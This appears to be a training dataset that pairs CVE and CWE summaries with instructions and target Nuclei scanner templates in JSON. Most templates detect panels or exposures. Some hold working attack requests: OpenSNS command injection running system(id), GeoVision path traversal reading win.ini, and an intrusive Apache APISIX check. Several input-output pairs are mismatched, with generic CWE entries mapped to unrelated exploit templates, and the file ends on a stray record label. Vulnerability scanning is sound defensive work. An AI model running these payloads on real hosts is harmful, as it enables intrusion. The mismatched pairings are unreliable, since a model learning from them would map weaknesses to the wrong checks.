{ "id": "cobalt-strike-c2", "info": { "name": "Cobalt Strike C2 - Detect", "author": "pussycat0x", "severity": "info", "description": "Cobalt Strike gives you a post-exploitation agent and covert channels to emulate a quiet long-term embedded actor in your customer's network.\n", "tags": [ "c2", "ssl", "tls", "ir", "osint", "malware", "panel", "cobalt-strike", "discovery" ], "reference": [ "https://blog.sekoia.io/hunting-and-detecting-cobalt-strike/" ] }, "requests": [ { "method": "GET", "path": [ "/" ], "matchers": [ { "type": "status", "status": [ 200 ] } ] } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-cobalt-strike-c2", "timestamp": "2025-11-13T15:16:08.468291Z" } }
CWE-89
[CANONICAL_RECORD] { "cve_id": "CWE-89", "summary": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.", "affected_products": [], "paths": [], "indicators": [ "vulnerability detected", "error" ], "severity_hint": "critical" } [RETRIEVED_TEMPLATES] [ { "id": "azure-takeover-detection", "severity": "high", "tags": [ "dns", "takeover", "azure", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "dmarc-detect", "severity": "info", "tags": [ "dns", "dmarc", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "elasticbeanstalk-takeover", "severity": "high", "tags": [ "dns", "takeover", "aws", "elasticbeanstalk", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "imo-rce", "info": { "name": "IMO - Remote Code Execution", "author": "ritikchaddha", "severity": "critical", "description": "The lax filtering of imo cloud office/file/NDisk/get_file.php allows unlimited file uploads. Attackers can directly obtain website permissions through this vulnerability.\n", "tags": [ "imo", "rce", "vuln" ], "reference": [ "https://www.henry4e36.top/index.php/archives/130.html#cl-1", "https://forum.butian.net/article/213" ] }, "requests": [ { "method": "GET", "path": [], "matchers": [ { "type": "word", "part": "body", "words": [ "imo" ] } ], "max_redirects": 2 }, { "method": "GET", "path": [], "matchers": [ { "type": "regex", "part": "body_1", "regex": [ "home/www/html/[^\"]*/file/NDisk" ] }, { "type": "regex", "part": "body_2", "regex": [ "uid=[0-9]+.*gid=[0-9]+.*" ] } ], "matchers_condition": "and" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 2, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-imo-rce", "timestamp": "2025-11-13T15:16:06.903948Z" } }
tidepool-malware-hash
[CANONICAL_RECORD] { "cve_id": "tidepool-malware-hash", "summary": "Detects TidePool malware mentioned in Ke3chang report by Palo Alto Networks\n", "affected_products": [], "paths": [], "indicators": [ "TidePool Malware Hash - Detect", "detected" ], "severity_hint": "info" } [RETRIEVED_TEMPLATES] [ { "id": "multi-region-logging-disabled", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "public-actiontrail-bucket", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "alibaba-cloud-code-env", "severity": "info", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "tidepool-malware-hash", "info": { "name": "TidePool Malware Hash - Detect", "author": "pussycat0x", "severity": "info", "description": "Detects TidePool malware mentioned in Ke3chang report by Palo Alto Networks\n", "tags": [ "malware", "tidepool" ], "reference": [ "http://goo.gl/m2CXWR", "https://github.com/Yara-Rules/rules/blob/master/malware/APT_Ke3Chang_TidePool.yar" ] }, "requests": [ { "method": "GET", "path": [ "/" ], "matchers": [ { "type": "status", "status": [ 200 ] } ] } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-tidepool-malware-hash", "timestamp": "2025-11-13T15:15:40.015770Z" } }
grav-register-admin
[CANONICAL_RECORD] { "cve_id": "grav-register-admin", "summary": "Exposed Grav admin user register page.. This template detects Grav Register Admin User - Detect by checking specific patterns and responses.", "affected_products": [], "paths": [ "{{BaseURL}}/admin" ], "indicators": [ "Grav Register Admin User | Grav", "admin accounts" ], "severity_hint": "high" } [RETRIEVED_TEMPLATES] [ { "id": "multi-region-logging-disabled", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "public-actiontrail-bucket", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "ack-cluster-api-public", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "ack" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "grav-register-admin", "info": { "name": "Grav Register Admin User - Detect", "author": "DhiyaneshDk", "severity": "high", "description": "Exposed Grav admin user register page.", "tags": [ "grav", "register", "admin", "misconfig", "vuln" ], "reference": [] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}/admin" ], "matchers": [ { "type": "word", "part": "body", "words": [ "Grav Register Admin User | Grav", "admin accounts" ], "condition": "and" }, { "type": "status", "status": [ 200 ] } ], "matchers_condition": "and" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-grav-register-admin", "timestamp": "2025-11-13T15:15:50.877703Z" } }
CVE-2021-29484
[CANONICAL_RECORD] { "cve_id": "CVE-2021-29484", "summary": "Ghost is a Node.js CMS. An unused endpoint added during the development of 4.0.0 has left sites vulnerable to untrusted users gaining access to Ghost Admin. Attackers can gain access by getting logged in users to click a link containing malicious code. Users do not need to enter credentials and may not know they've visited a malicious site. Ghost(Pro) has already been patched. We can find no evidence that the issue was exploited on Ghost(Pro) prior to the patch being added. Self-hosters are impacted if running Ghost a version between 4.0.0 and 4.3.2. Immediate action should be taken to secure your site. The issue has been fixed in 4.3.3, all 4.x sites should upgrade as soon as possible. As the endpoint is unused, the patch simply removes it. As a workaround blocking access to /ghost/preview can also mitigate the issue.", "affected_products": [ { "vendor": "ghost", "product": "ghost", "version_range": ">= 4.0.0, < 4.3.3" } ], "paths": [], "indicators": [ "error", "vulnerability detected" ], "severity_hint": "medium" } [RETRIEVED_TEMPLATES] [ { "id": "cve-2019-14287", "severity": "high", "tags": [ "packetstorm", "cve", "cve2019", "sudo", "code", "linux", "privesc", "local", "canonical", "sudo_project", "vuln" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "cve-2021-3156", "severity": "high", "tags": [ "packetstorm", "cve", "cve2021", "sudo", "code", "linux", "privesc", "local", "kev", "sudo_project", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "cve-2025-1974-k8s", "severity": "critical", "tags": [ "cve", "cve2025", "cloud", "devops", "kubernetes", "ingress", "nginx", "k8s", "k8s-cluster-security" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [ { "source": "nvd", "url": "https://blog.sonarsource.com/ghost-admin-takeover", "snippet": "PoC available at https://blog.sonarsource.com/ghost-admin-takeover" }, { "source": "nvd", "url": "https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg", "snippet": "PoC available at https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg" }, { "source": "nvd", "url": "https://www.npmjs.com/package/ghost", "snippet": "PoC available at https://www.npmjs.com/package/ghost" }, { "source": "nvd", "url": "https://blog.sonarsource.com/ghost-admin-takeover", "snippet": "PoC available at https://blog.sonarsource.com/ghost-admin-takeover" } ] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "cve-2021-29484", "info": { "name": "Ghost CMS <=4.32 - Cross-Site Scripting", "author": "rootxharsh,iamnoooob", "severity": "medium", "description": "Ghost CMS 4.0.0 to 4.3.2 contains a DOM cross-site scripting vulnerability. An unused endpoint added during the development of 4.0.0 allows attackers to gain access by getting logged-in users to click a link containing malicious code.", "tags": [ "cve2021", "cve", "xss", "ghost", "node.js", "vuln" ], "reference": [ "https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg", "https://www.npmjs.com/package/ghost", "https://forum.ghost.org/t/critical-security-update-available-for-ghost-4-x/22290", "https://nvd.nist.gov/vuln/detail/CVE-2021-29484", "https://github.com/ARPSyndicate/cvemon", "https://github.com/TryGhost/Ghost/blob/95651b33a66f3240535a61999b292a725f1b3317/core/server/web/admin/views/preview.html", "https://www.sonarsource.com/blog/ghost-admin-takeover/" ] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}/ghost/preview" ], "matchers": [ { "type": "word", "part": "body", "words": [ "XMLHttpRequest.prototype.open = XMLHttpRequest.prototype.send", "top.postMessage(" ], "condition": "and" }, { "type": "word", "part": "header", "words": [ "text/html" ] }, { "type": "status", "status": [ 200 ] } ], "matchers_condition": "and" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-CVE-2021-29484", "timestamp": "2025-11-13T15:15:43.164058Z" } }
CWE-200
[CANONICAL_RECORD] { "cve_id": "CWE-200", "summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p", "affected_products": [], "paths": [], "indicators": [ "error", "unauthorized" ], "severity_hint": "medium" } [RETRIEVED_TEMPLATES] [ { "id": "elasticbeanstalk-takeover", "severity": "high", "tags": [ "dns", "takeover", "aws", "elasticbeanstalk", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "caa-fingerprint", "severity": "info", "tags": [ "dns", "caa", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "detect-dangling-cname", "severity": "info", "tags": [ "dns", "takeover", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "openx-panel", "info": { "name": "OpenX/Revive Adserver Login Panel - Detect", "author": "pikpikcu,righettod", "severity": "info", "description": "OpenX login panel was detected. Note that OpenX is now a Revive Adserver.", "tags": [ "panel", "openx", "revive", "adserver", "login", "revive-adserver", "discovery" ], "reference": [ "https://www.revive-adserver.com/download/" ] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}/www/admin/index.php", "{{BaseURL}}/admin/index.php" ], "matchers": [ { "type": "regex", "part": "body", "regex": [ "<title>OpenX</title>", "<title>Revive Adserver</title>" ], "condition": "or" }, { "type": "status", "status": [ 200 ] } ], "matchers_condition": "and", "stop_at_first_match": true } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-openx-panel", "timestamp": "2025-11-13T15:15:48.981534Z" } }
phpsys-info
[CANONICAL_RECORD] { "cve_id": "phpsys-info", "summary": "phpSysInfo: a customizable PHP script that displays information about your system nicely\n", "affected_products": [], "paths": [ "{{BaseURL}}/phpsysinfo/index.php?disp=bootstrap" ], "indicators": [ "phpSysInfo", "Hardware Information" ], "severity_hint": "low" } [RETRIEVED_TEMPLATES] [ { "id": "multi-region-logging-disabled", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "public-actiontrail-bucket", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "ack-cluster-auditing-disable", "severity": "low", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "ack" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "phpsys-info", "info": { "name": "phpSysInfo Exposure", "author": "fpatrik", "severity": "low", "description": "phpSysInfo: a customizable PHP script that displays information about your system nicely\n", "tags": [ "config", "exposure", "phpsysinfo", "vuln" ], "reference": [ "https://phpsysinfo.github.io/phpsysinfo/" ] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}/phpsysinfo/index.php?disp=bootstrap" ], "matchers": [ { "type": "word", "words": [ "phpSysInfo", "Hardware Information" ], "condition": "and" }, { "type": "status", "status": [ 200 ] } ], "matchers_condition": "and" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-phpsys-info", "timestamp": "2025-11-13T15:15:49.776225Z" } }
dash-panel-detect
[CANONICAL_RECORD] { "cve_id": "dash-panel-detect", "summary": "Dash Panel Detect. This template detects Dash Panel Detect by checking specific patterns and responses.", "affected_products": [], "paths": [ "{{BaseURL}}" ], "indicators": [ "_dash-config", "DashRenderer" ], "severity_hint": "info" } [RETRIEVED_TEMPLATES] [ { "id": "multi-region-logging-disabled", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "public-actiontrail-bucket", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "alibaba-cloud-code-env", "severity": "info", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "dash-panel-detect", "info": { "name": "Dash Panel Detect", "author": "tess", "severity": "info", "description": "Dash Panel Detect. This template detects security vulnerabilities.", "tags": [ "tech", "dash", "discovery" ], "reference": [] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}" ], "matchers": [ { "type": "word", "part": "body", "words": [ "_dash-config", "DashRenderer" ], "condition": "and" }, { "type": "status", "status": [ 200 ] } ], "matchers_condition": "and", "max_redirects": 2 } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-dash-panel-detect", "timestamp": "2025-11-13T15:15:52.501311Z" } }
mixed-active-content
[CANONICAL_RECORD] { "cve_id": "mixed-active-content", "summary": "This check detects if there are any active content loaded over HTTP instead of HTTPS.\n", "affected_products": [], "paths": [ "{{BaseURL}}" ], "indicators": [ "Mixed Active Content", "detected" ], "severity_hint": "info" } [RETRIEVED_TEMPLATES] [ { "id": "alibaba-cloud-code-env", "severity": "info", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "ack-cluster-api-public", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "ack" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "ack-cluster-auditing-disable", "severity": "low", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "ack" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "mixed-active-content", "info": { "name": "Mixed Active Content", "author": "Liwermor", "severity": "info", "description": "This check detects if there are any active content loaded over HTTP instead of HTTPS.\n", "tags": [ "misconfig", "vuln" ], "reference": [ "https://developer.mozilla.org/en-US/docs/Web/Security/Mixed_content", "https://portswigger.net/kb/issues/01000400_mixed-content", "https://resources.infosecinstitute.com/topics/vulnerabilities/https-mixed-content-vulnerability/", "https://docs.gitlab.com/ee/user/application_security/dast/checks/319.1.html" ] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}" ], "matchers": [ { "type": "regex", "part": "body", "regex": [ "(?mi)<!--\\[if (lt|lte) IE [0-9]*\\]>\\s*<script[^>]*\\ssrc=\"http://" ], "negative": true }, { "type": "regex", "part": "body", "regex": [ "<!--\\s*<script" ], "negative": true }, { "type": "regex", "part": "body", "regex": [ "<script[^>]*src=['\"]http://[^'\">]+['\"]", "<iframe[^>]*src=['\"]http://[^'\">]+['\"]", "<object[^>]*data=['\"]http://[^'\">]+['\"]" ] }, { "type": "dsl", "dsl": [ "startswith(tostring(BaseURL), \"https://\")" ] } ], "matchers_condition": "and", "max_redirects": 0 } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-mixed-active-content", "timestamp": "2025-11-13T15:15:51.175389Z" } }
CVE-2020-13945
[CANONICAL_RECORD] { "cve_id": "CVE-2020-13945", "summary": "In Apache APISIX, the user enabled the Admin API and deleted the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. This affects versions 1.2, 1.3, 1.4, 1.5.", "affected_products": [ { "vendor": "apache", "product": "apisix", "version_range": ">= 1.2, <= 1.5" } ], "paths": [], "indicators": [ "error", "vulnerability detected" ], "severity_hint": "medium" } [RETRIEVED_TEMPLATES] [ { "id": "cve-2023-2640", "severity": "high", "tags": [ "cve", "cve2023", "code", "packetstorm", "kernel", "ubuntu", "linux", "privesc", "local", "canonical", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "cve-2023-2986", "severity": "critical", "tags": [ "cve", "cve2023", "wordpress", "woocommerce", "wp-plugin", "auth-bypass", "woocommerce-abandoned-cart", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}" ], "matcher_types": [ "status" ] }, { "method": "GET", "paths": [ "{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}" ], "matcher_types": [ "word", "word", "status" ] } ] }, { "id": "cve-2019-0604", "severity": "critical", "tags": [ "cve", "cve2019", "sharepoint", "microsoft", "rce", "kev", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [ { "source": "nvd", "url": "http://packetstormsecurity.com/files/166228/Apache-APISIX-Remote-Code-Execution.html", "snippet": "PoC available at http://packetstormsecurity.com/files/166228/Apache-APISIX-Remote-Code-Execution.html" }, { "source": "nvd", "url": "http://packetstormsecurity.com/files/166228/Apache-APISIX-Remote-Code-Execution.html", "snippet": "PoC available at http://packetstormsecurity.com/files/166228/Apache-APISIX-Remote-Code-Execution.html" } ] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "cve-2020-13945", "info": { "name": "Apache APISIX - Insufficiently Protected Credentials", "author": "pdteam", "severity": "medium", "description": "Apache APISIX 1.2, 1.3, 1.4, and 1.5 is susceptible to insufficiently protected credentials. An attacker can enable the Admin API and delete the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data.", "tags": [ "cve2020", "cve", "intrusive", "vulhub", "packetstorm", "apache", "apisix", "vuln" ], "reference": [ "https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945", "https://lists.apache.org/thread.html/r792feb29964067a4108f53e8579a1e9bd1c8b5b9bc95618c814faf2f%40%3Cdev.apisix.apache.org%3E", "http://packetstormsecurity.com/files/166228/Apache-APISIX-Remote-Code-Execution.html", "https://nvd.nist.gov/vuln/detail/CVE-2020-13945", "https://github.com/ARPSyndicate/cvemon" ] }, "requests": [ { "method": "GET", "path": [], "matchers": [ { "type": "word", "words": [ "\"action\":\"create\"", "\"script\":", "\"node\":" ], "condition": "and" }, { "type": "status", "status": [ 201 ] } ], "matchers_condition": "and" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-CVE-2020-13945", "timestamp": "2025-11-13T15:15:42.218114Z" } }
CWE-77
[CANONICAL_RECORD] { "cve_id": "CWE-77", "summary": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. Many protocols and products have their own custom command language. While OS or shell command strings are frequently discovered and targeted, developers may not realize that these other command languages might also be vulnerable to attac", "affected_products": [], "paths": [], "indicators": [ "vulnerability detected", "error" ], "severity_hint": "medium" } [RETRIEVED_TEMPLATES] [ { "id": "azure-takeover-detection", "severity": "high", "tags": [ "dns", "takeover", "azure", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "elasticbeanstalk-takeover", "severity": "high", "tags": [ "dns", "takeover", "aws", "elasticbeanstalk", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "ptr-fingerprint", "severity": "info", "tags": [ "dns", "ptr", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "opensns-rce", "info": { "name": "OpenSNS - Remote Code Execution", "author": "gy741", "severity": "critical", "description": "OpenSNS allows remote unauthenticated attackers to execute arbitrary code via the 'shareBox' endpoint.\n", "tags": [ "opensns", "rce", "vuln" ], "reference": [] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)", "{{BaseURL}}/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)" ], "matchers": [ { "type": "regex", "part": "body", "regex": [ "uid=([0-9(a-z)]+)", "Microsoft Windows" ], "condition": "or" }, { "type": "word", "words": [ "/Application/" ] }, { "type": "status", "status": [ 200 ] } ], "matchers_condition": "and" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-opensns-rce", "timestamp": "2025-11-13T15:16:07.314913Z" } }
CWE-22
[CANONICAL_RECORD] { "cve_id": "CWE-22", "summary": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Many file operations are intended to take place within a restricted directory. By using special elements such as \"..\" and \"/\" separators, attackers can escap", "affected_products": [], "paths": [], "indicators": [ "unexpected" ], "severity_hint": "high" } [RETRIEVED_TEMPLATES] [ { "id": "elasticbeanstalk-takeover", "severity": "high", "tags": [ "dns", "takeover", "aws", "elasticbeanstalk", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "fbi-seized-nameserver", "severity": "info", "tags": [ "dns", "ns", "darkweb", "fbi", "seized", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "azure-takeover-detection", "severity": "high", "tags": [ "dns", "takeover", "azure", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "geowebserver-lfi", "info": { "name": "GeoVision Geowebserver 5.3.3 - Local File Inclusion", "author": "madrobot", "severity": "high", "description": "GeoVision Geowebserver 5.3.3 allows remote unauthenticated attackers to disclose the content of locally stored files via local file inclusion.", "tags": [ "packetstorm", "geowebserver", "lfi", "xss", "vuln" ], "reference": [ "https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt" ] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini", "{{BaseURL}}/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa" ], "matchers": [ { "type": "word", "part": "body", "words": [ "bit app support", "fonts", "extensions" ], "condition": "and" }, { "type": "status", "status": [ 200 ] } ], "matchers_condition": "and" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-geowebserver-lfi", "timestamp": "2025-11-13T15:16:07.149435Z" } }
CWE-200
